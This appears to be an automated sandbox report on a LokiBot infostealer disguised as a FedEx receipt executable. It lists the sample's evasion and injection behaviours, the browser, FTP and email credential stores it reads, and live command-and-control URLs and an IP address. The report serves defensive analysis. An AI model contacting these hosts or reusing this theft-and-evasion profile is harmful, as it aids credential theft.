                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: FedEx_776282383902.exe PID: 6752, type: MEMORYSTR
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeMemory allocated: 12C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeMemory allocated: 8010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeMemory allocated: 7640000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeMemory allocated: 9010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeMemory allocated: A010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exe TID: 6676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exe TID: 4024Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeThread delayed: delay time: 60000Jump to behavior
                Source: FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]3_2_0040317B
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,3_2_00402B7C
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeMemory written: C:\Users\user\Desktop\FedEx_776282383902.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeProcess created: C:\Users\user\Desktop\FedEx_776282383902.exe "C:\Users\user\Desktop\FedEx_776282383902.exe"Jump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeQueries volume information: C:\Users\user\Desktop\FedEx_776282383902.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FedEx_776282383902.exe PID: 6752, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FedEx_776282383902.exe PID: 6192, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: PopPassword3_2_0040D069
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: SmtpPassword3_2_0040D069
                Source: Yara matchFile source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                1
                Access Token Manipulation
                1
                Masquerading
                2
                OS Credential Dumping
                11
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                Process Injection
                1
                Disable or Modify Tools
                2
                Credentials in Registry
                31
                Virtualization/Sandbox Evasion
                Remote Desktop Protocol1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                31
                Virtualization/Sandbox Evasion
                Security Account Manager1
                File and Directory Discovery
                SMB/Windows Admin Shares2
                Data from Local System
                1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Access Token Manipulation
                NTDS13
                System Information Discovery
                Distributed Component Object ModelInput Capture111
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
                Process Injection
                LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Deobfuscate/Decode Files or Information
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                FedEx_776282383902.exe66%ReversingLabsByteCode-MSIL.Trojan.LokiBot
                FedEx_776282383902.exe100%AviraHEUR/AGEN.1357257
                FedEx_776282383902.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                http://alphastand.win/alien/fre.php100%URL Reputationmalware
                https://gmpg.org/xfn/110%URL Reputationsafe
                http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                http://alphastand.top/alien/fre.php100%URL Reputationmalware
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://45.61.137.215/index.php/feed/100%Avira URL Cloudmalware
                http://45.61.137.215/index.php/comments/feed/100%Avira URL Cloudmalware
                http://45.61.137.215/index.php/t?id=090100%Avira URL Cloudmalware
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: malware
                unknown
                http://45.61.137.215/index.php/t?id=090true
                • Avira URL Cloud: malware
                unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: malware
                unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: malware
                unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://45.61.137.215/index.php/feed/FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                https://gmpg.org/xfn/11FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://45.61.137.215/index.php/comments/feed/FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                https://www.chiark.greenend.org.uk/~sgtatham/putty/0FedEx_776282383902.exefalse
                • URL Reputation: safe
                unknown
                http://www.ibsensoftware.com/FedEx_776282383902.exe, FedEx_776282383902.exe, 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                45.61.137.215
                unknownUnited States
                40676AS40676UStrue
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1446057
                Start date and time:2024-05-22 22:00:47 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 29s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:FedEx_776282383902.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@3/3@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 78
                • Number of non-executed functions: 14
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: FedEx_776282383902.exe
                TimeTypeDescription
                16:01:36API Interceptor35x Sleep call for process: FedEx_776282383902.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                45.61.137.215hgDQGUqtEg.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215/index.php/3b1tenbkyj
                g1lrdXCX39.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215/index.php/index?id=671120760852658
                gunzipped.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215/index.php/modify?post=1
                FedEx Receipt_AWB# 102235506763.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215/index.php/t?id=090
                DHLAwb#82102199382.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215/index.php/index?id=671120760852658
                TBHD77628238942.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215/index.php/6790
                Dospecepotrazivanja_pdf.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215/index.php/3b1tenbkyj
                RFQ#678903403.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215/index.php/t?id=090
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AS40676USdn7MMSZM9O.elfGet hashmaliciousUnknownBrowse
                • 206.201.59.139
                hgDQGUqtEg.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215
                g1lrdXCX39.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215
                N5fJpUN6DR.elfGet hashmaliciousMiraiBrowse
                • 192.154.214.57
                gunzipped.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215
                FedEx Receipt_AWB# 102235506763.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215
                DHLAwb#82102199382.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215
                TBHD77628238942.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215
                SecuriteInfo.com.Win32.BackdoorX-gen.12322.17143.exeGet hashmaliciousXWormBrowse
                • 41.216.183.101
                Dospecepotrazivanja_pdf.exeGet hashmaliciousLokibotBrowse
                • 45.61.137.215
                No context
                No context
                Process:C:\Users\user\Desktop\FedEx_776282383902.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1216
                Entropy (8bit):5.34331486778365
                Encrypted:false
                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                Malicious:false
                Reputation:high, very likely benign file
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                Process:C:\Users\user\Desktop\FedEx_776282383902.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:high, very likely benign file
                Preview:1
                Process:C:\Users\user\Desktop\FedEx_776282383902.exe
                File Type:data
                Category:dropped
                Size (bytes):50
                Entropy (8bit):1.5212424590621707
                Encrypted:false
                SSDEEP:3:/lvlp:p
                MD5:C851BF93667BDD6310D56581D955C2AE
                SHA1:8FC5AEC1542BD7471BF815632863622EFE23A834
                SHA-256:3C1A3E1EF8840689F0C6EC14E22435FC79EBC3F8771B7CD230F784CC81AE431D
                SHA-512:D3D597D36DE0EE75AA44F4F8571E56DAD810E7E6C9839F5D5E6BB05846AB6E61FAF1E9530333BD6EC5AB04098AAE935A522DBD149D214A5971A7368E18C3C9B4
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:........................................user.
                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.963823125421934
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.97%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:FedEx_776282383902.exe
                File size:539'656 bytes
                MD5:d8754ead54bc3ccd3bb50e726362aef9
                SHA1:d5c8560b76bfbf841db72e06b311f1c0346b20a5
                SHA256:25c3b63be2ea8b26be5050a732146c6f611dc335a96f80860dec608ece37bc4e
                SHA512:b7fd0cafefe3e6a35d38ee8b5da5bbe2d193dfab2d42e5b32b22fb833cebb835bd5290c26ed5e96f54a36d2d4aeed97ef229847e43ef927e3b00167155a5270c
                SSDEEP:12288:w+YifTFYVONOtTf6uxbTBTxOSbqojamEUufjkR:whiRYIruxb9hajK
                TLSH:8BB423633398F22BD75885737069803A9FFB75952C54CBCD2DE211898BD2B2045F2BA7
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.Kf..............0.................. ... ....@.. .......................`............@................................
                Icon Hash:d4c0aa9a96d6aa80
                Entrypoint:0x4810c6
                Entrypoint Section:.text
                Digitally signed:true
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x664BFF43 [Tue May 21 01:56:19 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                Signature Valid:false
                Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                Signature Validation Error:The digital signature of the object did not verify
                Error Number:-2146869232
                Not Before, Not After
                • 13/11/2018 01:00:00 09/11/2021 00:59:59
                Subject Chain
                • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                Version:3
                Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                Serial:7C1118CBBADC95DA3752C46E47A27438
                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x810740x4f.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000xf50.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x806000x3608
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x7f0cc0x7f2000d4bfbb7fc18f7274db8d0d3c360696eFalse0.9626544063421829data7.9734414761650525IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc0x820000xf500x1000eb7f485a41acc29530103a74dee81375False0.69140625data6.5012090734218955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
